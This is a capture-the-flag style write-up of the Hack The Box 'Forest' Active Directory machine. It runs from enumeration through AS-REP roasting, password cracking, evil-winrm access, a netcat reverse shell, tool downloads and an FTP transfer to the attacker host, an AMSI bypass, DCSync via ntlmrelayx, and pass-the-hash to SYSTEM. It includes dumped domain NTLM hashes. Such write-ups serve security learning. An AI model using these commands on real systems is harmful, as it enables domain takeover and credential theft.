As usual, first an nmap scan
root@kalivm:~/Forest# nmap -sTV -p 1-65535 -oN fullscan_tcp 10.10.10.161
Starting Nmap 7.80 (https://nmap.org ) at 2020-01-06 11:47 CET
Nmap scan report for 10.10.10.161
Host is up (0.016s latency).
Not shown: 65511 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain?
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2019-10-21 09:54:20Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49675/tcp open msrpc Microsoft Windows RPC
49682/tcp open msrpc Microsoft Windows RPC
49701/tcp open msrpc Microsoft Windows RPC
49913/tcp open msrpc Microsoft Windows RPC
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 159.67 seconds
There are already several interesting things in this result. First of all, this is a domain-connected system with the HTB.local domain. It has exposed kerberos, ldap and SMB services to the outside world and looks like it is a domain controller. And last but not least, a WinRM port is open. This could be an attack similar to the approach I took a long time ago for the ‘Active’ Machine on Hackthebox, combined with the winRM attack on Heist!
First let’s try enum4linux to see if I can list some more information.
root@kalivm:~/Forest# enum4linux -a 10.10.10.161
Starting enum4linux v0.8.9
==========================
| Target Information |
==========================
Target ........... 10.10.10.161
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
---snip---
===========================================
| Getting domain SID for 10.10.10.161 |
===========================================
Domain Name: HTB
Domain Sid: S-1-5-21-3072663084-364016917-1341370565
[+] Host is part of a domain (not a workgroup)
---snip---
=============================
| Users on 10.10.10.161 |
=============================
---snip---
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]
---snip---
====================================================
| Password Policy Information for 10.10.10.161 |
====================================================
[+] Attaching to 10.10.10.161 using a NULL share
[+] Trying protocol 445/SMB...
[+] Found domain(s):
[+] HTB
[+] Builtin
[+] Password Info for Domain: HTB
[+] Minimum password length: 7
[+] Password history length: 24
[+] Maximum password age: 41 days 23 hours 53 minutes
[+] Password Complexity Flags: 000000
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0
[+] Minimum password age: 1 day 4 minutes
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: Not Set
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 7
---snip---
==============================
| Groups on 10.10.10.161 |
==============================
---snip---
[+] Getting domain groups:
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Organization Management] rid:[0x450]
group:[Recipient Management] rid:[0x451]
group:[View-Only Organization Management] rid:[0x452]
group:[Public Folder Management] rid:[0x453]
group:[UM Management] rid:[0x454]
group:[Help Desk] rid:[0x455]
group:[Records Management] rid:[0x456]
group:[Discovery Management] rid:[0x457]
group:[Server Management] rid:[0x458]
group:[Delegated Setup] rid:[0x459]
group:[Hygiene Management] rid:[0x45a]
group:[Compliance Management] rid:[0x45b]
group:[Security Reader] rid:[0x45c]
group:[Security Administrator] rid:[0x45d]
group:[Exchange Servers] rid:[0x45e]
group:[Exchange Trusted Subsystem] rid:[0x45f]
group:[Managed Availability Servers] rid:[0x460]
group:[Exchange Windows Permissions] rid:[0x461]
group:[ExchangeLegacyInterop] rid:[0x462]
group:[$D31000-NSEL5BRJ63V7] rid:[0x46d]
group:[Service Accounts] rid:[0x47c]
group:[Privileged IT Accounts] rid:[0x47d]
group:[test] rid:[0x13ed]
[+] Getting domain group memberships:
Group 'Enterprise Admins' (RID: 519) has member: HTB\Administrator
Group 'Privileged IT Accounts' (RID: 1149) has member: HTB\Service Accounts
Group 'Service Accounts' (RID: 1148) has member: HTB\svc-alfresco
Group 'Domain Controllers' (RID: 516) has member: HTB\FOREST$
Group 'Exchange Trusted Subsystem' (RID: 1119) has member: HTB\EXCH01$
---snip---
enum4linux complete on Mon Oct 21 12:05:29 2019
Enum4linux offers many interesting things. First of all I see that there are some users (sebastien, lucinda, andy, mark, santi) present and a clear service account (svc-alfresco).
Furthermore, no password complexity seems to have been enforced, which can mean easy to guess / crack passwords. There seems to be a Microsoft Exchange installation present which is commonly known as a major security vulnerability if not properly configured! And a last line confirms the prompting, Forest is actually part of the group of domain controllers! So I started browsing the impacket tools and trying several until I got to the GetNPUsers.py tool.
┌─[✗]─[puck@parrot-lt]─[~/htb/legacy/forrest]
└──╼ $python3 GetNPUsers.py -dc-ip 10.10.10.161 -no-pass HTB/sebastien
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
root@kalivm:~/Forest# GetNPUsers.py -dc-ip 10.10.10.161 -no-pass HTB/lucinda
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
[*] Getting TGT for lucinda
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
root@kalivm:~/Forest# GetNPUsers.py -dc-ip 10.10.10.161 -no-pass HTB/svc-alfresco
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
[*] Getting TGT for svc-alfresco
$krb5asrep$23$svc-alfresco@HTB:38ca5d56d9fb6fd3c11015cecd122482$e6e0c606ccf778924c3e4dc02f63f3bfeae8c4b67ea08044268db8bde81aa007fb921555847d786b92084b72f6a2ac83d8843b33c5005e768208a7ede2e37663ce6891e080b45a11b361d0b5979e2eb9bf885f8e983ed21b4891559301dc693fc71d3eb2e7d8ec2b77b5668ec23ca4599bfddd3d9163325231d1933f50637cc8af4eba5f351dd703c91c2ded255ebec3d3629bbd0949ae1d5df267010acd0289440e255abe7955ce2c5658dd8ef83cc0eaccd84a1b293334edad0398cf78247cc275aaae85bba3f42f3de757ab726547d401f06cda2b8af5f9200d8f95f7001e
After trying it for some users, I finally got a TGT for the user svc-alfresco that I could try cracking with John
┌─[puck@parrot-lt]─[~/htb/forrest] └──╼ $john forrest.hash --fork=4 -w=/opt/rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x]) Will run 2 OpenMP threads per process (8 total across 4 processes) Node numbers 1-4 of 4 (fork) Press 'q' or Ctrl-C to abort, almost any other key for status s3rvice ($krb5asrep$23$svc-alfresco@HTB) 4 1g 0:00:00:02 DONE (2022-09-06 12:12) 0.4504g/s 460108p/s 460108c/s 460108C/s s5210523..s3r10u55 1 0g 0:00:00:07 DONE (2022-09-06 12:12) 0g/s 488548p/s 488548c/s 488548C/s !)KAT9aim.ie168 Waiting for 3 children to terminate 2 0g 0:00:00:07 DONE (2022-09-06 12:12) 0g/s 485899p/s 485899c/s 485899C/s !)!\\.abygurl69 3 0g 0:00:00:07 DONE (2022-09-06 12:12) 0g/s 483932p/s 483932c/s 483932C/s !)&!@!^^^%.a6_123 Session completed ┌─[puck@parrot-lt]─[~/htb/forrest]
So apparently Alfresco’s password is s3rvice. ll you have to do is get the user hash and start escalating privileges
┌─[puck@parrot-lt]─[~/htb/forrest]
└──╼ $evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> dir
Privilege Escalation
The next step is escalating privileges, after pressing CTRL-C too many times I decided it was time to install a simple fallback.
root@kalivm:~/Forest# ruby shell.rb
PS > mkdir sedje
PS > cd sedje
PS > IWR -uri http://10.10.15.64:8000/nc.exe -outfile nc.exe
PS > ./nc 10.10.15.64 9002 -e powershell.exe
root@kalivm:~/Forest# nc -nvlp 9002
Listening on 0.0.0.0 9002
Connection received on 10.10.10.161 50030
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.
PS C:\Users\svc-alfresco\Documents\sedje>
PS C:\Users\svc-alfresco\Documents\sedje> IWR -uri http://10.10.15.64:8000/SharpHound.ps1 -outfile SharpHound.ps1
PS C:\Users\svc-alfresco\Documents\sedje> IWR -uri http://10.10.15.64:8000/SharpHound.exe -outfile SharpHound.exe
PS C:\Users\svc-alfresco\Documents\sedje> Import-Module .\SharpHound.ps1
PS C:\Users\svc-alfresco\Documents\sedje> Invoke-BloodHound -CollectionMethod All -LDAPUser svc-alfresco -LDAPPass s3rvice
PS C:\Users\svc-alfresco\Documents\sedje> dir
Directory: C:\Users\svc-alfresco\Documents\sedje
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/25/2019 5:20 AM 12950 20191025120253_BloodHound.zip
-a---- 10/25/2019 5:20 AM 9151 Rk9SRVNU.bin
-a---- 10/25/2019 5:18 AM 751616 SharpHound.exe
-a---- 10/25/2019 5:17 AM 886595 SharpHound.ps1
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> upload SharpHound.exe Info: Uploading SharpHound.exe to C:\Users\svc-alfresco\Documents\SharpHound.exe Data: 1402196 bytes of 1402196 bytes copied Info: Upload successful! *Evil-WinRM* PS C:\Users\svc-alfresco\Documents> ./SharpHound.exe All 2022-09-06T03:34:37.8848043-07:00|INFORMATION|This version of SharpHound is compatible with the 4.2 Release of BloodHound 2022-09-06T03:34:38.2441827-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote 2022-09-06T03:34:38.3847964-07:00|INFORMATION|Initializing SharpHound at 3:34 AM on 9/6/2022 2022-09-06T03:34:39.6035545-07:00|INFORMATION|Flags: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote 2022-09-06T03:34:40.9785510-07:00|INFORMATION|Beginning LDAP search for htb.local 2022-09-06T03:34:41.4004375-07:00|INFORMATION|Producer has finished, closing LDAP channel 2022-09-06T03:34:41.4004375-07:00|INFORMATION|LDAP channel closed, waiting for consumers 2022-09-06T03:35:11.4786322-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 47 MB RAM 2022-09-06T03:35:25.5255232-07:00|INFORMATION|Consumers finished, closing output channel 2022-09-06T03:35:25.5567715-07:00|INFORMATION|Output channel closed, waiting for output task to complete Closing writers 2022-09-06T03:35:25.6661470-07:00|INFORMATION|Status: 161 objects finished (+161 3.659091)/s -- Using 49 MB RAM 2022-09-06T03:35:25.6661470-07:00|INFORMATION|Enumeration finished in 00:00:44.7682293 2022-09-06T03:35:25.7442762-07:00|INFORMATION|Saving cache with stats: 118 ID to type mappings. 117 name to SID mappings. 0 machine sid mappings. 2 sid to domain mappings. 0 global catalog mappings. 2022-09-06T03:35:25.7442762-07:00|INFORMATION|SharpHound Enumeration Completed at 3:35 AM on 9/6/2022! Happy Graphing! *Evil-WinRM* PS C:\Users\svc-alfresco\Documents> dir Directory: C:\Users\svc-alfresco\Documents Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 9/6/2022 3:35 AM 18873 20220906033525_BloodHound.zip -a---- 9/6/2022 3:35 AM 19538 MzZhZTZmYjktOTM4NS00NDQ3LTk3OGItMmEyYTVjZjNiYTYw.bin -a---- 9/6/2022 3:29 AM 1051648 SharpHound.exe *Evil-WinRM* PS C:\Users\svc-alfresco\Documents>
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> download 20220906033525_BloodHound.zip
Info: Downloading 20220906033525_BloodHound.zip to ./20220906033525_BloodHound.zip
Info: Download successful!
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents>
After the SharpHound script and binary file are transferred, I run them with the user svc-alfresco and the script provides a zip file with all relevant domain data. All that remains is to transfer the file to my local machine and analyze it with BloodHound. The easiest and most used way I learned during my OSCP journey was to easily create and run an FTP script.
PS C:\Users\svc-alfresco\Documents\sedje> echo "open 10.10.15.64" > ftp
PS C:\Users\svc-alfresco\Documents\sedje> echo "anonymous" >> ftp
PS C:\Users\svc-alfresco\Documents\sedje> echo "" >> ftp
PS C:\Users\svc-alfresco\Documents\sedje> echo "put 20191101052032_BloodHound.zip" >> ftp
PS C:\Users\svc-alfresco\Documents\sedje> echo "quit" >> ftp
PS C:\Users\svc-alfresco\Documents\sedje> ftp -s:ftp
open 10.10.15.64
Log in with USER and PASS first.
User (10.10.15.64:(none)):
put 20191025120253_BloodHound.zip
quit
Of course, this approach requires an active FTP server on my attacker, which can be easily done with Python
root@kalivm:~/Forest# python -m pyftpdlib -p 21 -w
/usr/lib/python2.7/dist-packages/pyftpdlib/authorizers.py:244: RuntimeWarning: write permissions assigned to anonymous user.
RuntimeWarning)
[I 2019-10-25 13:15:13] >>> starting FTP server on 0.0.0.0:21, pid=5057 < <<
[I 2019-10-25 13:15:13] concurrency model: async
[I 2019-10-25 13:15:13] masquerade (NAT) address: None
[I 2019-10-25 13:15:13] passive ports: None
[I 2019-10-25 13:15:27] 10.10.10.161:56840-[] FTP session opened (connect)
[I 2019-10-25 13:15:27] 10.10.10.161:56840-[anonymous] USER 'anonymous' logged in.
[I 2019-10-25 13:15:27] 10.10.10.161:56840-[anonymous] STOR /root/Documents/htb/Machines/Forest/20191025120253_BloodHound.zip completed=1 bytes=12950 seconds=0.07
[I 2019-10-25 13:15:27] 10.10.10.161:56840-[anonymous] FTP session closed (disconnect).
Thus, the file has been successfully transferred and can be loaded directly into BloodHound by simply dragging and dropping.
PS C:\Users\svc-alfresco\Documents\sedje> IWR -uri http://10.10.15.64:8000/PowerView.ps1 -outfile Powerview.ps1
PS C:\Users\svc-alfresco\Documents\sedje> Import-Module .\PowerView.ps1
PS C:\Users\svc-alfresco\Documents\sedje> $SecPassword = ConvertTo-SecureString 's3rvice' -AsPlainText -Force
PS C:\Users\svc-alfresco\Documents\sedje> $Cred = New-Object System.Management.Automation.PSCredential('HTB\svc-alfresco', $SecPassword)
PS C:\Users\svc-alfresco\Documents\sedje> New-DomainUser -SamAccountName sedje -AccountPassword $SecPassword -Credential $Cred | Add-DomainGroupMember 'Exchange Windows Permissions' -Credential $Cred
When you add the svc alfresco account to the ‘Exchange Windows Permissions’ group, it will be deleted again after a few minutes, which is quite a pain. So I decide to add my own user to the domain with the same password as user svc-alfresco and add to the group `Exchange Windows permissions`. However, after that, I lingered for a long time due to the very specific syntax and switches required (and available) with the impacket tools. If some Discord users had not helped me, I would probably have given up in the end, so I have to thank them for pushing them in the next step!
root@kalivm:~/Forest# ntlmrelayx.py --escalate-user sedje -t ldap://10.10.10.161
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
[*] Protocol Client SMB loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server
[*] Servers started, waiting for connections
Now all I have to do is browse to the localhost connection and provide valid credentials, NTLMRelay will do all the hard work and change the permissions for me.I open a browser for localhost and provide the sedje credentials.
[*] HTTPD: Received connection from 127.0.0.1, attacking target ldap://10.10.10.161
[*] HTTPD: Client requested path: /
[*] HTTPD: Client requested path: /
[*] HTTPD: Client requested path: /
[*] Authenticating against ldap://10.10.10.161 as \sedje SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] User privileges found: Create user
[*] User privileges found: Modifying domain ACL
[*] Querying domain security descriptor
[*] Success! User sedje now has Replication-Get-Changes-All privileges on the domain
[*] Try using DCSync with secretsdump.py and this user :)
[*] Saved restore state to aclpwn-20191025-135738.restoresedsedss
And ntlmrelayx.py already tells me what to do, sedje now has proper permissions to continue secretsdump.py.
root@kalivm:~/Forest# secretsdump.py htb/sedje:s3rvice@10.10.10.161
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\$331000-VK4ADACQNUCA:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
---snip---
Use secretsdump.py to get all the hashes in the domain
root@kalivm:~/Forest# psexec.py -hashes :32693b11e6aa90eb43d32c72a07ceea6 htb/administrator@10.10.10.161 powershell.exe
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
[*] Requesting shares on 10.10.10.161.....
[*] Found writable share ADMIN$
[*] Uploading file ezaVoayr.exe
[*] Opening SVCManager on 10.10.10.161.....
[*] Creating service CAke on 10.10.10.161.....
[*] Starting service CAke.....
[!] Press help for extra shell commands
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.
PS C:\Windows\system32> whoami
whoami
nt authority\system
PS C:\Windows\system32> type c:\Users\Administrator\Desktop\root.txt
type c:\Users\Administrator\Desktop\root.txt
f048153f202bbb2f82622b04d79129cc
….
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net user puck abc123! /add /domain The command completed successfully. *Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net group "Exchange Windows Permissions" puck /add The command completed successfully. *Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net localgroup "Remote Management Users" puck /add The command completed successfully.
.
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> upload PowerView.ps1 Info: Uploading PowerView.ps1 to C:\Users\svc-alfresco\Documents\PowerView.ps1 Data: 1027036 bytes of 1027036 bytes copied Info: Upload successful! *Evil-WinRM* PS C:\Users\svc-alfresco\Documents> . ./PowerView.ps1 *Evil-WinRM* PS C:\Users\svc-alfresco\Documents> menu ,. ( . ) " ,. ( . ) . (" ( ) )' ,' ( ' (" ) )' ,' . ,) .; ) ' (( (" ) ;(, . ;) " )" .; ) ' (( (" ) );(, )(( _".,_,.__).,) (.._( ._), ) , (._..( '.._"._, . '._)_(..,_(_".) _( _') \_ _____/__ _|__| | (( ( / \ / \__| ____\______ \ / \ | __)_\ \/ / | | ;_)_') \ \/\/ / |/ \| _/ / \ / \ | \\ /| | |__ /_____/ \ /| | | \ | \/ Y \ /_______ / \_/ |__|____/ \__/\ / |__|___| /____|_ /\____|__ / \/ \/ \/ \/ \/ By: CyberVaca, OscarAkaElvis, Jarilaos, Arale61 @Hackplayers [+] Add-DomainGroupMember [+] Add-DomainObjectAcl [+] Add-RemoteConnection [+] Add-Win32Type [+] Convert-ADName [+] Convert-DNSRecord [+] ConvertFrom-LDAPLogonHours [+] ConvertFrom-SID [+] ConvertFrom-UACValue [+] Convert-LDAPProperty [+] ConvertTo-SID [+] Dll-Loader [+] Donut-Loader [+] Export-PowerViewCSV [+] field [+] Find-DomainLocalGroupMember [+] Find-DomainObjectPropertyOutlier [+] Find-DomainProcess [+] Find-DomainShare [+] Find-DomainUserEvent [+] Find-DomainUserLocation [+] Find-InterestingDomainAcl [+] Find-InterestingDomainShareFile [+] Find-InterestingFile [+] Find-LocalAdminAccess [+] func [+] Get-Domain [+] Get-DomainComputer [+] Get-DomainController [+] Get-DomainDFSShare [+] Get-DomainDNSRecord [+] Get-DomainDNSZone [+] Get-DomainFileServer [+] Get-DomainForeignGroupMember [+] Get-DomainForeignUser [+] Get-DomainGPO [+] Get-DomainGPOComputerLocalGroupMapping [+] Get-DomainGPOLocalGroup [+] Get-DomainGPOUserLocalGroupMapping [+] Get-DomainGroup [+] Get-DomainGroupMember [+] Get-DomainGroupMemberDeleted [+] Get-DomainGUIDMap [+] Get-DomainManagedSecurityGroup [+] Get-DomainObject [+] Get-DomainObjectAcl [+] Get-DomainObjectAttributeHistory [+] Get-DomainObjectLinkedAttributeHistory [+] Get-DomainOU [+] Get-DomainPolicyData [+] Get-DomainSearcher [+] Get-DomainSID [+] Get-DomainSite [+] Get-DomainSPNTicket [+] Get-DomainSubnet [+] Get-DomainTrust [+] Get-DomainTrustMapping [+] Get-DomainUser [+] Get-DomainUserEvent [+] Get-Forest [+] Get-ForestDomain [+] Get-ForestGlobalCatalog [+] Get-ForestSchemaClass [+] Get-ForestTrust [+] Get-GPODelegation [+] Get-GptTmpl [+] Get-GroupsXML [+] Get-IniContent [+] Get-NetComputerSiteName [+] Get-NetLocalGroup [+] Get-NetLocalGroupMember [+] Get-NetLoggedon [+] Get-NetRDPSession [+] Get-NetSession [+] Get-NetShare [+] Get-PathAcl [+] Get-PrincipalContext [+] Get-RegLoggedOn [+] Get-WMIProcess [+] Get-WMIRegCachedRDPConnection [+] Get-WMIRegLastLoggedOn [+] Get-WMIRegMountedDrive [+] Get-WMIRegProxy [+] Invoke-Binary [+] Invoke-Kerberoast [+] Invoke-RevertToSelf [+] Invoke-UserImpersonation [+] New-ADObjectAccessControlEntry [+] New-DomainGroup [+] New-DomainUser [+] New-DynamicParameter [+] New-InMemoryModule [+] New-ThreadedFunction [+] psenum [+] Remove-DomainGroupMember [+] Remove-DomainObjectAcl [+] Remove-RemoteConnection [+] Resolve-IPAddress [+] Set-DomainObject [+] Set-DomainObjectOwner [+] Set-DomainUserPassword [+] struct [+] Test-AdminAccess [+] Bypass-4MSI [+] services [+] upload [+] download [+] menu [+] exit *Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Bypass-4MSI Info: Patching 4MSI, please be patient... [+] Success! *Evil-WinRM* PS C:\Users\svc-alfresco\Documents>
.
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> $SecPassword = ConvertTo-SecureString 'abc123!' -AsPlainText -Force *Evil-WinRM* PS C:\Users\svc-alfresco\Documents> *Evil-WinRM* PS C:\Users\svc-alfresco\Documents> $Cred = New-Object System.Management.Automation.PSCredential('htb\puck', $SecPassword) *Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Add-ObjectACL -PrincipalIdentity puck -Credential $cred -Rights DCSync *Evil-WinRM* PS C:\Users\svc-alfresco\Documents>
.
┌─[puck@parrot-lt]─[~/htb/forrest] └──╼ $python3 secretsdump.py htb/puck@10.10.10.161 Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation Password:abc123! [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: htb.local\$331000-VK4ADACQNUCA:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: htb.local\SM_2c8eef0a09b545acb:1124:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: htb.local\SM_ca8c2ed5bdab4dc9b:1125:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: htb.local\SM_75a538d3025e4db9a:1126:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: htb.local\SM_681f53d4942840e18:1127:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: htb.local\SM_1b41c9286325456bb:1128:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: htb.local\SM_9b69f1b9d2cc45549:1129:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: htb.local\SM_7c96b981967141ebb:1130:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: htb.local\SM_c75ee099d0a64c91b:1131:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: htb.local\SM_1ffab36a2f5f479cb:1132:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: htb.local\HealthMailboxc3d7722:1134:aad3b435b51404eeaad3b435b51404ee:4761b9904a3d88c9c9341ed081b4ec6f::: htb.local\HealthMailboxfc9daad:1135:aad3b435b51404eeaad3b435b51404ee:5e89fd2c745d7de396a0152f0e130f44::: htb.local\HealthMailboxc0a90c9:1136:aad3b435b51404eeaad3b435b51404ee:3b4ca7bcda9485fa39616888b9d43f05::: htb.local\HealthMailbox670628e:1137:aad3b435b51404eeaad3b435b51404ee:e364467872c4b4d1aad555a9e62bc88a::: htb.local\HealthMailbox968e74d:1138:aad3b435b51404eeaad3b435b51404ee:ca4f125b226a0adb0a4b1b39b7cd63a9::: htb.local\HealthMailbox6ded678:1139:aad3b435b51404eeaad3b435b51404ee:c5b934f77c3424195ed0adfaae47f555::: htb.local\HealthMailbox83d6781:1140:aad3b435b51404eeaad3b435b51404ee:9e8b2242038d28f141cc47ef932ccdf5::: htb.local\HealthMailboxfd87238:1141:aad3b435b51404eeaad3b435b51404ee:f2fa616eae0d0546fc43b768f7c9eeff::: htb.local\HealthMailboxb01ac64:1142:aad3b435b51404eeaad3b435b51404ee:0d17cfde47abc8cc3c58dc2154657203::: htb.local\HealthMailbox7108a4e:1143:aad3b435b51404eeaad3b435b51404ee:d7baeec71c5108ff181eb9ba9b60c355::: htb.local\HealthMailbox0659cc1:1144:aad3b435b51404eeaad3b435b51404ee:900a4884e1ed00dd6e36872859c03536::: htb.local\sebastien:1145:aad3b435b51404eeaad3b435b51404ee:96246d980e3a8ceacbf9069173fa06fc::: htb.local\lucinda:1146:aad3b435b51404eeaad3b435b51404ee:4c2af4b2cd8a15b1ebd0ef6c58b879c3::: htb.local\svc-alfresco:1147:aad3b435b51404eeaad3b435b51404ee:9248997e4ef68ca2bb47ae4e6f128668::: 